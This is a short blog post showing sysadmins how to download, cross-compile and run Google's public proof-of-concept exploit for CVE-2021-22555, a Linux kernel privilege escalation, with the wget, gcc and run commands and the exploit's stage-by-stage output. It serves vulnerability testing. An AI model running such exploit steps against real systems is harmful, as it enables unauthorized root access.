Compiling the CVE-2021-22555 exploit Proof of concept

July 15, 2021 -
Tags: c, linux, quick, security, sysadmin

Today (Jul/15/2021), on Hacker News, it’s been published the CVE-2021-22555: Turning \x00\x00 into 10000$ (entertaining) article.

In the related GitHub repository, the source of the proof of concept is provided, however, for programmers not familiar with C, it’s not obvious how to compile it.

A list of kernel versions is provided, however, there are cases where identifying the kernel exploitability is not immediate.

In order to avoid hairpulling to fellow sysadmins, this article shows the procedure to compile the PoC on modern Ubuntu/Debian machines, with comments.

Content:

Procedure

# Reference: https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555

# Download the PoC. Caution should always be applied for procedures like this; in this case, keep in
# mind that this is a Google official repository.
#
wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c

# The exploit needs the executable to be 32-bits, so we need to cross compile. For this specific case,
# this package will take care of the problem.
#
# Without this package, odd errors about missing headers will be raised, like:
#
#     /usr/include/linux/errno.h:1:10: fatal error: asm/errno.h: No such file or directory
#         1 | #include <asm/errno.h>
#
apt install --yes gcc-multilib

# Now we can compile it.
#
gcc -m32 -static -o exploit exploit.c

# Observe the binary architecture.
#
file exploit
# exploit: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, BuildID[sha1]=7d69a76adf18149d1c076b1dda2cac96fda6d033, for GNU/Linux 3.2.0, not stripped

# Run it! This is an example of non-exploitable system.
#
./exploit
# [+] Linux Privilege Escalation by theflow@ - 2021
#
# [+] STAGE 0: Initialization
# [*] Setting up namespace sandbox...
# [*] Initializing sockets and message queues...
#
# [+] STAGE 1: Memory corruption
# [*] Spraying primary messages...
# [*] Spraying secondary messages...
# [*] Creating holes in primary messages...
# [*] Triggering out-of-bounds write...
# [*] Searching for corrupted primary message...
# [-] Error could not corrupt any primary message.